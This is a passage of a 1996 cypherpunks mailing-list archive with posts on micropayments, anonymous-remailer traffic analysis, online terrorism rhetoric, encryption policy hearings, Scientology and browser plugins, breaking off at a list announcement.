Looking at micropayments from the (economically) conservative element
viewpoint within certain industries make them seem a lot less appealing, as
well.  Take television.  If people had to purchase every TV show they
watched, there would be a lot less TV production going on because there
wouldn't be as much random TV watching.   No matter how stupid you may
think your customers are, if you change their pay structure they think
about it - even if only briefly.  It would also be harder to sell TV
advertising, because if nobody was watching a show everyone would know
because this would be metered even better than current rating systems.  The
nature of the TV advertising industry would change because instead of the
archetypal/statistical sampling of Nielsen ratings, you'd know *exactly*
who was watching what.

Both micropayments and data mining require that the user give the vendor a
level of trust which most vendors are not willing to repay with similar
trust and customer satisfaction.  Customer-users are expected to give
vendors greater access to and control over their money and personal
information, yet at best they can expect the same poor customer service and
bureaucratic attitudes encountered when dealing with traditional
transaction processing companies and at worst can expect to be swindled out
of piles of money and/or have their
privacy violated as a matter of course.

Working where I do, everyone around me is on the side of the vendors - who
make up part of our client base.  On cypherpunks, of course, I'm largely
preaching to the converted.  There can be a middle ground, however the
middle ground that's been offered so far still leaves the consumer with the
sort end of the stick and
I'm not convinced they're ultimately what's best for business - especially if
you cling to seemingly outdated ideas like good customer relations, good
public/social relations, and long range growth relationships over short
term
profit pumping.


ttl
Stephan

-------------------------------------------------------------------
This signature has been kidnapped by space aliens.
If you find it you can call (415) 703-8748.
I work for Studio Archetype, and they don't find any of this funny.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brad Shantz" <bshantz@nwlink.com>
Date: Wed, 12 Jun 1996 11:03:26 +0800
To: cypherpunks@toad.com
Subject: Re: Kahn's "The CodeBreakers"
Message-ID: <199606111757.KAA02353@montana.nwlink.com>
MIME-Version: 1.0
Content-Type: text/plain


Good call, Tim.  That is correct.  I had forgotten. 

> Ah, but it does have some significance. "Liberty" is published out of Port
> Townsend. (More precisely, it was the last time I looked.)
 
> And it's near Hump Tulips, Sequim, and Chimicum (sp?). Ma and Pa Kettle country.

Sequim is further west along the Olympic Peninsula, and Chimacum is 
just south of Port Townsend towards Port Hadlock and the Hood Canal 
bridge.

Once again, good call, Tim.
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 12 Jun 1996 09:30:38 +0800
To: cypherpunks@toad.com
Subject: Re: Anonymous return addresses
Message-ID: <199606111814.LAA19675@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: "Robert A. Rosenberg" <hal9001@panix.com>
> If the message is split into more than one part (to meet the message size
> requirement) there is some potential leakage to each server of what message
> is being requested. If User a requested 3 messages, then they MAY be
> requesting all three parts of a 3 part message (or 2+1). If a record is
> kept of the number of requests over time, then there can be some regression
> checking based on the ID (ie: If the number of new messages for ANx in the
> DB matches the number that User Y requests in the current session). I may
> be in error with this thought but it looks like a possible problem.

Yes, this is a good point.  It might be addressed by having the later
parts of a multi part message not be identified with the anon ID of the
receiver, but rather with a random message label which is revealed to the
receiver in the first part of the message (encrypted, of course).  Then
the database owner could not tell which message parts went together just
by looking at the messages.  Arrival times might give this away, though,
if all parts of a multi-part message were sent at about the same time.

> >Messages would have a finite lifetime and would expire and be removed
> >from the database after a while.  The authors propose breaking the
> >database up into batches with a fixed number of messages, but I don't
> >fully follow the reasoning behind this.  I guess it reduces the load on
> >the server when it does its XOR's.
> 
> This can also affect the "attack" I speculated on above since it can "leak"
> more info. Multi-part messages (or multiple messages to the same recipient)
> which are retrieved in one session can be correlated between the groups
> (ie: User Y asked for 5 messages [Selected from Groups 1&5] and ANx is the
> one AN? that has the requested number of messages in each of the Groups
> [ie: 3 from G1 and 2 from G5]).

Yes, there is a tradeoff with the batch size between efficiency and
privacy.  The multi-part message issue does seem to make the problem
potentially worse.  Maybe it would be necessary for anonymous receivers
to mostly receive small messages, and/or make the message granularity
relatively large.

Some of these kinds of volume- or correlation-based traffic analysis
techniques can be countered by requesting dummy messages, ones which the
receiver won't be able to read.  If he asks for five messages every day
from that day's batch then it doesn't leak any information about which
ones are for him.  Asking for a random number averaging five may work
even better, if occasionally he really needs to read six.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: talon57@well.com
Date: Wed, 12 Jun 1996 15:02:23 +0800
To: cypherpunks@toad.com
Subject: Re: Terrorism Hysteria on the net
Message-ID: <199606111912.MAA23432@well.com>
MIME-Version: 1.0
Content-Type: text/plain



snow  wrote:

>>Give me 15 well trained soldiers(near special forces level) and
>>I can do it in less than 60 days. Without touching a computer.

Gary Howland <gary@systemics.com> adds:
>Give me 10 well trained biological warfare scientists and I'll do
>it in 30 ...

>Anymore bids?  :-)

Yeah, Give me one really sick monkey .....

Brian








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: editor@cdt.org (Bob Palacios)
Date: Wed, 12 Jun 1996 16:49:24 +0800
To: cypherpunks@toad.com
Subject: CDT Policy Post 2.24 - Join Sen. Burns TONIGHT (6/11), 10 EDT
Message-ID: <v02140b08ade34e072059@[204.157.127.16]>
MIME-Version: 1.0
Content-Type: text/plain


-----------------------------------------------------------------------------
    _____ _____ _______
   / ____|  __ \__   __|   ____        ___               ____             __
  | |    | |  | | | |     / __ \____  / (_)______  __   / __ \____  _____/ /_
  | |    | |  | | | |    / /_/ / __ \/ / / ___/ / / /  / /_/ / __ \/ ___/ __/
  | |____| |__| | | |   / ____/ /_/ / / / /__/ /_/ /  / ____/ /_/ (__  ) /_
   \_____|_____/  |_|  /_/    \____/_/_/\___/\__, /  /_/    \____/____/\__/
   The Center for Democracy and Technology  /____/     Volume 2, Number 24
----------------------------------------------------------------------------
      A briefing on public policy issues affecting civil liberties online
----------------------------------------------------------------------------
 CDT POLICY POST Volume 2, Number 24                        June 11, 1996

 CONTENTS: (1) Join Senator Burns Live Online TONIGHT at 10pm EDT - Preview
               Tomorrow's Hearing on "Pro-CODE" Encryption Bill
           (2) Attend the S.A.F.E. Forum on Encryption - July 1, Stanford, CA
           (3) How to Subscribe/Unsubscribe
           (4) About CDT, contacting us

  ** This document may be redistributed freely with this banner in tact **
        Excerpts may be re-posted with permission of <editor@cdt.org>
         ** This document looks best when viewed in COURIER font **
-----------------------------------------------------------------------------

  ** UPDATE: DECISION IS NEAR IN FIGHT TO SAVE FREE SPEECH ONLINE **

  An announcement from the Court is expected any time. Be sure to visit
     http://www.cdt.org/ciec/ for the latest news and information!

-----------------------------------------------------------------------------

(1) JOIN SENATOR BURNS LIVE ONLINE =TONIGHT= at 10PM EDT: Preview Tomorrow's
    Hearing on "Pro-CODE" Encryption Bill

 --> Visit http://www.hotwired.com/wiredside/ for details <--

Senator Conrad Burns (R-MT) will be on HotWired's WiredSide chat TONIGHT
(6/11) at 10pm EDT to discuss tomorrow's scheduled hearing on his
"Promotion of Commerce Online in the Digital Era Act of 1996" ("Pro-CODE")
encryption bill.

Tonight's WiredSide chat is a great opportunity to join Senator Burns on
the eve of an important hearing to ask questions about encryption policy
and get a preview of what the Senator expects to occur at the hearing.

Senator Burns will chair the first of two scheduled hearings on his
"Pro-CODE" bill tomorrow at 9:30 EDT in Room 253 of the Russell Senate
Office Building.  The hearing will take place in the Commerce Subcommittee
on Science, Technology and Space.  This is the first Congressional hearing
in recent memory to discuss "pro-encryption" legislation that would relax
current restrictive encryption export controls.

Never before has the public had this much access to legislators without
geographical proximity.  Cheaper than teleconferencing, and more direct
and unfiltered than the traditional press, online chats allow the public
to directly question and hear the answers from members of Congress.

The online chat is at 10pm EDT (7pm PDT) TONIGHT (6/11). HotWired's
WiredSide chat is at:

     http://www.hotwired.com/wiredside/

Tonight's forum is another in a series of planned events, and is part
of a broader project coordinated by CDT and the Voters Telecommunications
Watch (VTW) designed to encourage members of Congress to work with the
Net.community on vital Internet policy issues and to bring the Internet
Community into the debate about those issues.

Transcripts from previous online chats are available -- for transcript
information and details about upcoming events, please visit CDT's newest
Issues Page, "Congress and the Net":

     http://www.cdt.org/net_congress/

SEN. BURNS TO CHAIR "PRO-CODE" HEARINGS -- FIRST HEARING TOMORROW (Wed 6/12)

The hearing tomorrow will take place in the Commerce Subcommittee
on Science, Technology and Space, of which Sen. Burns is the chairman.
This first hearing will focus on encryption as it relates to commerce and
business issues.  Prominent industry representatives have been invited to
testify at the hearing.  Scheduled to testify are:

  o Michael Zisman, president and CEO of Lotus;
  o Jim Barksdale, president and CEO of Netscape Communications;
  o Jim Bidzos, president and CEO of RSA Data Security;
  o Tim Krauskopf, V.P. and co-founder of Spyglass Inc.;
  o Kenneth Dam, chairman of the National Research Council;
  o Richard Sevcik, Senior V.P. of Hewlett-Packard;
  o Joe Holmes, chief technology officer for EDS;
  o Joel S. Lisker, senior V.P. for security and risk management at
    MasterCard;
  o Danne Buchanan, president of Zion's Data Services Company;
  o Jack Valenti, executive director of the Motion Picture Association of
    America;
  o Aharon Friedman, chairman, founder and chief technical officer of Digital
    Secured Networks Technology Inc.; and
  o Robert Bigony, senior V.P. and director of strategic marketing, government
    and space technology group, for Motorola.

The second hearing, scheduled for June 26, will focus on privacy, law
enforcement, and national security issues.

For more information about tomorrow's hearing, background on the "Pro-CODE"
legislation (including the text of the bill), and other information
about encryption issues, please visit the Encryption Policy Resource Page
at:

http://www.crypto.com/

or the CDT Cryptography Issues Page at:

http://www.cdt.org/crypto/

------------------------------------------------------------------------
(2) ATTEND THE S.A.F.E. FORUM ON ENCRYPTION - JULY 1 IN STANFORD, CA

On July 1, 1996, members of Congress, prominent computer industry leaders,
noted cryptographers, privacy advocates, press, and netizens will meet in
the heart of California's Silicon Valley for a lively, all-day forum to
discuss cryptography and the need to reform current U.S. encryption policy.

Anyone interested in the future of encryption technology and policy is
strongly encouraged to attend.  Admission to this special event is free, but
those interested must reserve a ticket to attend.  (Please visit the S.A.F.E.
web site to reserve your ticket - http://www.crypto.com/safe/ )

The S.A.F.E. (Security and Freedom Through Encryption) Forum will be held on
Monday July 1st from 9:00am - 4:00pm at Kresge Auditorium on the campus of
Stanford University in Stanford, CA.  S.A.F.E. will feature panel discussions,
interactive demonstrations of cryptography technology, and an opportunity for
feedback from the public.

Scheduled participants include such industry leaders and cryptographers as:

  o Marc Andreeson, Vice President of Netscape Communications Corp.;
  o James Bidzos, President of RSA Data Security;
  o Eric Schmidt, Chief Technical Officer, Sun Microsystems;
  o Brad Silverberg, Senior V.P., Microsoft Corp.; and
  o noted computer security experts Matt Blaze and Eric Thompson.

Members of Congress scheduled to attend include:

  o Sen. Conrad Burns (R-MT),
  o Sen. Patrick Leahy (D-VT) [via satellite]
  o Sen. Larry Pressler (R-SD),
  o Rep. Tom Campbell (R-CA),
  o Rep. Zoe Lofgren (D-CA), and
  o Rep. Anna Eshoo (D-CA).

By bringing together policymakers, industry leaders, cryptographers,
net.advocates, and netizens, the forum promises to be an enlightening
and informative event that will help raise public awareness for the
importance of encryption technology to enhance privacy and security on
the global information infrastructure.  The forum will also detail the
problems posed by the current U.S. encryption policy.

The S.A.F.E. forum is sponsored by:
  o America Online
  o American Civil Liberties Union
  o Americans for Tax Reform
  o AT&T
  o Business Software Alliance
  o Center for Democracy and Technology
  o Center for National Security Studies
  o Commercial Internet eXchange
  o CompuServe Incorporated
  o Computer Professionals for Social Responsibility
  o Cylink Corporation
  o EDS
  o Electronic Frontier Foundation
  o Electronic Messaging Association
  o Electronic Privacy Information Center
  o Information Technology Association of America
  o IEEE - USA
  o Media Institute
  o Microsoft Corporation
  o National Association of Manufacturers
  o Netcom Online Communication Services
  o Netscape Communications Corporation
  o Novell, Inc.
  o Oracle Corporation
  o Pacific Telesis Group
  o Prodigy, Inc.
  o Progress and Freedom Foundation
  o Securities Industry Association
  o Software Publishers Association
  o Sybase, Inc.
  o Voters Telecommunications Watch
  o Wired Magazine

For the latest information about S.A.F.E. and to reserve your free ticket to
the forum, please visit the S.A.F.E. Web site:

http://www.crypto.com/safe/

------------------------------------------------------------------------
(3) SUBSCRIPTION INFORMATION

Be sure you are up to date on the latest public policy issues affecting
civil liberties online and how they will affect you! Subscribe to the CDT
Policy Post news distribution list.  CDT Policy Posts, the regular news
publication of the Center For Democracy and Technology, are received by
nearly 10,000 Internet users, industry leaders, policy makers and
activists, and have become the leading source for information about
critical free speech and privacy issues affecting the Internet and other
interactive communications media.

To subscribe to CDT's Policy Post list, send mail to

     policy-posts-request@cdt.org

with a subject:

     subscribe policy-posts

If you ever wish to remove yourself from the list, send mail to the
above address with a subject of:

     unsubscribe policy-posts

-----------------------------------------------------------------------
(4) ABOUT THE CENTER FOR DEMOCRACY AND TECHNOLOGY/CONTACTING US

The Center for Democracy and Technology is a non-profit public interest
organization based in Washington, DC. The Center's mission is to develop
and advocate public policies that advance democratic values and
constitutional civil liberties in new computer and communications
technologies.

Contacting us:

General information:  info@cdt.org
World Wide Web:       URL:http://www.cdt.org/
FTP                   URL:ftp://ftp.cdt.org/pub/cdt/

Snail Mail:  The Center for Democracy and Technology
             1634 Eye Street NW * Suite 1100 * Washington, DC 20006
             (v) +1.202.637.9800 * (f) +1.202.637.0968

-----------------------------------------------------------------------
End Policy Post 2.24                                            6/11/96
-----------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: vin@shore.net (Vin McLellan)
Date: Wed, 12 Jun 1996 12:54:37 +0800
To: cypherpunks@toad.com
Subject: Re: Terrorism Hysteria on the Net
Message-ID: <v02140b02ade3451bc523@[198.115.179.222]>
MIME-Version: 1.0
Content-Type: text/plain


        Ex-Special-Agent Settle deserves all the derision he has gotten
(probably not in the right places) for his LSD-in-the-water-supply threat:

>> >> "You bring me a select group of hackers and within 90 days I'll bring
>> >> this country to its knees, " says Jim Settle, retired director of the
>> >> FeeBee's computer crime squad.

        snow's jibe about doing the same with a handful of spooky special
forces guys (less than 15, if he used snipers) was appropriate.

        I think, however, Dale Drew went too far when he denied that the
demension of the Net added nothing new to the range of social or economic
threat.  Don't we, as a technical culture, have to acknowledge the
burgening nihilism that is exemplified in both the subculture of virus (and
other randomly distructive pieces of attack code,) and the larger culture
that so often lauds their "creativity" and "ingenuity."  Not even
lumpen-Libertarianism allows the author of such pain and distruction to
escape moral responsibility -- yet the popular tech culture (and the pop
culture) does just that!

        The culture can deal with purposeful terrorism, even purposeful Net
terrorism,  but a whole subculture of sociopaths who -- like arsonists on a
binge, or (to exaggerate slightly) the nerve gas cult in Japan -- toss out
distructive code bombs to see who or what gets blown away, is indeed
something new.

        How many wild viruses are now loose?  What new corners of the
networked infrastructure will be the next forum for these arsonists?  Java
applets?  NT?  The nodes of the Net itself?

        Is this too to be left to police suppression?  Are Net Cops
inevitable?  Are there other forces that could be brought to bear?  (Forces
that could perhaps be influenced by the tone or substance of comments that
originate here or in similar forums?)  And isn't this threat unique to a
culture which has become so dependant on the structured flow of information
products and tools?

        The sky isn't falling; there are no bodies in the street -- so we
have time... but the sense of threat could become so serious that the
public would seek shelter, solice, stability. The spooks' wet-dream, the
wiretapped Garrison Nation (two-way TV always on; no one allowed to whisper
away from a microphone)  is one answer.  Of a sort.

        Suerte,

                        _Vin

         Vin McLellan +The Privacy Guild+ <vin@shore.net>
      53 Nichols St., Chelsea, Ma. 02150 USA Tel: (617) 884-5548
                         <*><*><*><*><*><*><*><*><*>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Wed, 12 Jun 1996 13:29:07 +0800
To: cypherpunks@toad.com
Subject: Comments on MicroPayments and the Web
Message-ID: <2.2.32.19960611193553.00cb57a0@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


I do not see micropayment schemes gaining any acceptance in the long run.
Here is why...

1)  I expect a few scam artists out there to pull something like with what
has been done with 976 numbers.  Put up something that looks like a "hot
page" and then charge you lots of cash when you hit the site.  (Instead of a
fraction of a cent, a quarter or twenty bucks?)  If they are a heavy web
surfer, the ream of paper needed to find the offending page would be pretty
obnoxious.  Most would just pay the bill.  (Leading to even more scams of
this type.)

2)  If a dialog comes up for each site that wants to ding you for a bit of
money, these sites are going to resemble the pay toilets of the net.  People
will go there if they have to, but avoid them (or crawl under with an old
browser) if they can.

All in all, it just sounds like another scam dreamed up by someone in
marketing to Make Money Fast off the Internet.
---
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 12 Jun 1996 15:26:24 +0800
To: cypherpunks@toad.com
Subject: Re: Slander of Catholic Church
Message-ID: <ade31529110210043f6a@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:59 PM 6/11/96, attila wrote:

>        too strong, moroni  --remember _our_ values; not those of a critic.
>    last night in FHE I covered the first mob in Jackson County where Bushop
>    Partridge turned the other cheek to make it easier after the first was
>    tarred by the mob.

Thanks, Attila. I think Paul Penrod and the Archangel Moroni missed my main
point. I was not singling out Mormonism for special criticism, just using
it as an example of a "cult" or "religion" which is in many ways even more
"outre" to many of us than Scientology is. Belief that a body rotting in
the ground can be baptized into one's church is at least as odd as
believing that Mankind is descended from the survivors of spaceships
fleeing an evil overlord.

My point, in using Catholicism as an example (interesting that only my
brief lines on Mormon views were critiqued...Catholicism must indeed be
nearly extinct on lists like ours), was that one's man's "criminal cult" is
another man's "holy religion," and that the "net.war" declared by some on
the Church of Scientology is little different than having a similar war
against Catholics, Rosicrucians, Parsees, whatever.

The Church of Scientology is no more a cult than is LDS or
Catholicism....it is just much newer. Believing that clam consciousness
suffuses our thoughts is no stranger than are the bizarre claims of most
religions.

Talk is of some belief systems being "cults" and others being "religions."
When the Constitution speaks of "Congress shall make no law regarding the
establishment of religion...," it is clear that this is not just for
"recognized" and "established" religions.

(Before the usual suspects jump in with quibbles, this does not mean that a
religion may not be constrained in various ways. The laws against polygamy
constrained the Mormons, the laws against certain drugs constrained certain
Native American religions, etc. Constitutional law classes are the best
forum to debate this.)

I am no supporter of the CoS, nor of any religion. I find it hypocritical
for folks bashing the "clams" and bombarding a.r.s with copyrighted CoS
material to now be whining that the clams are "unfairly" using a.r.s.

I also find it "unsurprising" that the CoS is taking steps to preserve what
it thinks is its copyrighted, proprietary material.

(I am  not interested in debating the ins and outs of whether the NOTS
material should or should not have been published, nor of whether some
investigators went overboard in investigations of Grady Ward, etc. This
stuff is boring ephemera to me, just another religious war.)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Wed, 12 Jun 1996 15:04:53 +0800
To: cypherpunks@toad.com
Subject: Re: plugging in
In-Reply-To: <199606111316.JAA29512@jekyll.piermont.com>
Message-ID: <199606111805.NAA03561@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


> Indeed -- the notion is that one could do things like put support for
> encrypted/signed pages or other cryptographic tools (I haven't checked
> if Netscape mail handles plugins, too) directly into Netscape where
> ordinary users could smoothly use them.

Doing tech support at my ISP has made me very skeptical of anything that
requires a plug in.  Most people aren't willing or able to download and
install them.  Obviously that's not a problem for large organizations who
want to run something internally -- they can make people install them and
provide support to make sure it happens.  But if you want to publish to
the mainstream of people who use the net, using a plug in is a very bad
idea. 

(I don't know anyone that doesn't design web pages for a living who's 
installed the shockwave plugin, for example.  I'm sure that people do, 
just not the people I know.  Only a marketing hack would download a 
couple of megabyte plug in to look at a soda company's web page.)

SSL has a lot of problems (Verisign's pound of flesh, signatures on sites 
rather than documents, etc.), and those problems make a PGP based system 
attractive.  But SSL's ubiquity (is that a word?) and the inherent 
kludginess of a PGP based plug-in make me think that the latter wouldn't 
have a snowball's chance in hell of catching on.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Wed, 12 Jun 1996 06:53:01 +0800
To: cypherpunks@toad.com
Subject: USS_hit
Message-ID: <199606111358.NAA28670@pipe2.ny3.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   6-11-96. FiTi: 
 
   "US squares up to cyberterrorists." 
 
      Until recently, the concept of "information warfare" has 
      been widely dismissed as alarmist rhetoric and viewed as 
      "post Cold War hysteria" generated by those with an 
      interest in maintaining the vast US intelligence 
      apparatus. But the potential use of computer networks to 
      undermine public confidence, disrupt essential services, 
      play havoc with the economy or damage military 
      capabilities is now being taken seriously in Washington. 
 
      Encryption may be just one of many battlegrounds -- 
      others include: proposals for mandatory reporting of 
      corporate computer intrusions and for exceptions to US 
      laws that prohibit intelligence agencies from snooping 
      on domestic communications; the forthcoming ruling by US 
      courts on free speech on the Internet, in response to 
      laws aimed at stopping distribution of pornographic 
      material; and possible limits on information that 
      marketers may gather and use about children who surf the 
      Internet. Also the Clinton administration is planning a 
      rapid-response team to take charge in the event of a 
      cyberterrorist attack. 
 
   USS_hit 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Tue, 11 Jun 1996 23:55:44 +0800
To: cypherpunks@toad.com
Subject: [Fwd: public key expert witness wanted]
Message-ID: <31BD5FC2.15FB7483@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain

>From sci.crypt:


Subject: public key expert witness wanted
From: schlafly@bbs.cruzio.com
Date: Mon, 10 Jun 1996 05:37:34 GMT
Keywords: public key expert witness wanted
Newsgroups: sci.crypt,misc.int-property,talk.politics.crypto
Organization: Cruzio Community Networking System, Santa Cruz, CA
Reply-To: schlafly@bbs.cruzio.com
Sender: news@cruzio.com (The News User)
Xref: beta.nedernet.nl sci.crypt:44606 misc.int-property:17035 talk.politics.crypto:17141


My lawsuit against Public Key Partners has a trial on the
scope and validity of the Stanford patents scheduled to
begin in San Jose, Calif, on Sept. 3, 1996.  I am looking
for an expert witness.

Requirements:

* credentials which will impress the court.
* live within driving distance of San Jose.
* thorough understanding of Diffie-Hellman exponential key exchange,
Hellman-Merkle trapdoor knapsack, and related public key crypto.
* willing to face hostile lawyers in depositions, and testify in court.
* must enjoy this sort of thing enough to do it for free.

I am not looking for a mercenary hatchet man.  (Contact RSADSI or
Cylink if that's what you are.)  Just someone to explain the
inventions, and give opinions as to what can reasonably be deduced
from particular disclosures.

For more info on the lawsuit, and on contacting me, see
     http://bbs.cruzio.com/~schlafly#pkpsuit

Roger Schlafly




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 12 Jun 1996 17:24:40 +0800
To: "Stephan Vladimir Bugaj" <stephan@studioarchetype.com>
Subject: Re: Micropayments are Crap
In-Reply-To: <v03006f04ade3579bc415@[204.162.75.169]>
Message-ID: <199606112120.OAA29300@netcom2.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



once again, I am confused why this micropayment thing is
considered so controversial and questionable to some. it
seems at the forefront of sensibility to me. clearly we
are struggling with different conceptions/preconceptions
of something that doesn't yet exist.

>As far as I'm concerned Micropayments as appealing to me as Data Mining. 

an interesting way to start off the essay, considering how much data
mining is starting to catch on and the positive, quantifiable
returns it is generating.

 I
>certainly see how my wallet would benefits from being on the receiving end of
>the money and/or information, but I can also clearly see the detrements of
>being the one whose money and information was "automagically" being
>appropriated.

can people "automagically" take money from your ATM card? nope. in the
same way, your microwallet will be secure. it will be even more secure,
because less money is involved.

> but try convincing a vendor who is already suspicious of
>'all this computer stuff' that you really sent them some money and a savvy
>hacker pilfered it all - log or no log.

there is no "convincing someone". people are using the idea of 
handing over money, of bills, etc-- all this makes no sense. it is
all handled at the transaction level. there is no subjectivity. the
vendor either received the cash or not. the cryptographic protocols
can ensure that the money is transferred. the data is not delivered
unless the payment is received. scam artists can be caught with
"better business bureau" type rating services.

>Setting a micropayment enabled web browser to automatically grant approval to
>payments of $.02/action may seem reasonable, but it depends on what the vendor
>has decided constitues an action. 
> If somone charged $.02/nanosecond for
>retreiving shareware from an FTP library, and my browser was set to accept this
>as reasonable based on the fact that it was $.02/action,

the poster clearly suggested payment PER TIME as a limit.  a pretty
obvious concept, and easy to implement, don't you think? why does it
figure as one of your major objections?

>This doesn't happen with phones (well, not as much).  The virtual nomadness of
>wandering the net leaves a lot of people - even otherwise careful people -
>vulnerable to rate traps.

it won't happen with micropayments either, because it will be *your*wallet*
that tells you when it is has an opportunity to pay. no one is dipping
into your wallet, metaphorically. the actions are always initiated by you.

>Micropayment proponents are incredibly fond of the proposition that software
>could be leased on a usage time basis from a centralized server, and people
>could also rent time on the servers' CPUs.  Sounds an awful lot like the
>mainframe days to me. 

somewhat. mainframes aren't totally the mark of the devil. don't you pay
your internet provider per hour? how many people do? isn't a Sun pretty
much equivalent/similar in processing power & capability to old mainframes?
you raise all kinds of objections that make no sense to me.

 I see plenty of ways in which this benefits the
>vendor
>(greater control over distribution, centrailzed revision/upgrade distribution,
>greater profits over one-time sales, etc.), but no ways in which this benefits
>the user.

the user is always free to go where a better vendor gives him what he
wants. because the user can now pay in tiny increments, he has enormous
increase freedom. he can move between different services far more readily.
no body is FORCING anyone to spend money. 

  Especially the power user.  I'm certainly not going to rent time
>on a compiler or image editing program every single time I want to do some
>work.

uh huh. what if over your lifetime it cost far less than you pay for
a shinkwrapped package? what if you only needed a quick compilation on
a system you don't normally use? I think you will begin to figure out
some advantages if you use your imagination to find them (instead of the
drawbacks)

> As a
>programmer, I can
>see how I could make a fat chunk of change by bilking people through metered
>software usage, but as a software consumer it seems like a rotten idea. 

you have this concept of "automated billing" that simply doesn't fit. people
know how much they are being charged. the payment is UNDER THE COMPLETE
CONTROL OF THE PAYER, NOT THE BILLER. this simple misconception seems to
underly a lot of the micropayment objections I've been seeing.

 One
>effect it would have, however, would be an exponential increase in the quality
>and quantity of software available from the Free Software Foundation and
>other similar groups as people like myself fled en-masse from commercial
>software to a
>system where we knew what we were getting into ahead of time.

or, it may be that entire new industries spring up because the software
companies are better able to be compensated for their work from skittish
consumers. people may be more free about spending micropayments than 
buying shrinkwrapped software. psychologically I think micropayments
are far more appealing in some ways.

>The other rotten part of this idea, of course, is the irritating lag times
>involved with trying to run distributed software (especially poorly
>distributed
>software, and especially on an overloaded network infrastructure).

admittedly some things have to be in place: a high speed network, and
other infrastructure ideas. it isn't totally feasible today in cyberspace,
but large parts of it are and are already being implemented (chaum's
digicash)

>Looking at micropayments from the (economically) conservative element
>viewpoint within certain industries make them seem a lot less appealing, as
>well.  Take television.  If people had to purchase every TV show they
>watched, there would be a lot less TV production going on because there
>wouldn't be as much random TV watching.

false, imho. imagine that I can buy only the shows I want to watch, and it comes
out to less than my $20 monthly cable bill. economically this is perfectly
sensible. people want to pay for what they watch. you seem to think that
micropayments means "everything costs more". a strange assumption. what if
I assume, "everything costs less" because billing costs, which other
posters have pointed out are so enormous, are vaporized?

it is true that some industries will change and meld into other forms
with this new revolutionary form of payment.  welcome to the concept of
 an economy in which anything that is stagnant tends to die.

   No matter how stupid you may
>think your customers are, if you change their pay structure they think
>about it - even if only briefly.  It would also be harder to sell TV
>advertising, because if nobody was watching a show everyone would know
>because this would be metered even better than current rating systems. 

right. shows that are not watched are going to go extinct. why should
advertisers fund them? you think that advertisers have to be fooled
to pay money to a show?

 The
>nature of the TV advertising industry would change because instead of the
>archetypal/statistical sampling of Nielsen ratings, you'd know *exactly*
>who was watching what.

that's correct. why do you suggest it would be an infeasible apocalypse?
it might be an apocalypse of old concepts, but it isn't infeasible.

>Both micropayments and data mining require that the user give the vendor a
>level of trust which most vendors are not willing to repay with similar
>trust and customer satisfaction.  Customer-users are expected to give
>vendors greater access to and control over their money and personal
>information, yet at best they can expect the same poor customer service and
>bureaucratic attitudes encountered when dealing with traditional
>transaction processing companies and at worst can expect to be swindled out
>of piles of money and/or have their
>privacy violated as a matter of course.

false, imho. again the consumer maintains complete control. in a sense
they have far greater control. if they don't like a company they
can go somewhere else after only spending a micropayment instead of
a macropayment. you may find that companies increase their level of
service and customer satisfaction. but there will probably bogus uses
that apparently you will gravitate towards, based on your seeming
preference for them.

>Working where I do, everyone around me is on the side of the vendors - who
>make up part of our client base.  On cypherpunks, of course, I'm largely
>preaching to the converted.  There can be a middle ground, however the
>middle ground that's been offered so far still leaves the consumer with the
>sort end of the stick and
>I'm not convinced they're ultimately what's best for business - especially if
>you cling to seemingly outdated ideas like good customer relations, good
>public/social relations, and long range growth relationships over short
>term
>profit pumping.

imagine shareware authors getting cash for their programs based on their
actual use. imagine artists and writers bypassing corporate monoliths
and marketing their work to the public directly, bypassing the enormous
scrape-off that these self-perpetuating bureacracies snarf.

you seem to start from the assumption, "businesses are out to shaft the
little guy". well, that can be true whether you have micropayments
or not. I doubt micropayments would make it any worse. it won't solve
the problem (I agree there is a great greed in places) but it may actually
make it far more difficult for companies to shaft people, once you think
about it. remember, the consumer has total control. how can you get
shafted when you have total control?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blake Coverett <blake@bcdev.com>
Date: Wed, 12 Jun 1996 13:15:31 +0800
To: "'Cypherpunks List'" <cypherpunks@toad.com>
Subject: RE: ANNOUNCEMENT: HACKERPUNKS MAILING LIST
Message-ID: <01BB57A1.75690A70@bcdev.com>
MIME-Version: 1.0
Content-Type: text/plain


>                       H  A  C  K  E  R  P  U  N  K  S  
>                        "Obscurity through Security!"
> 
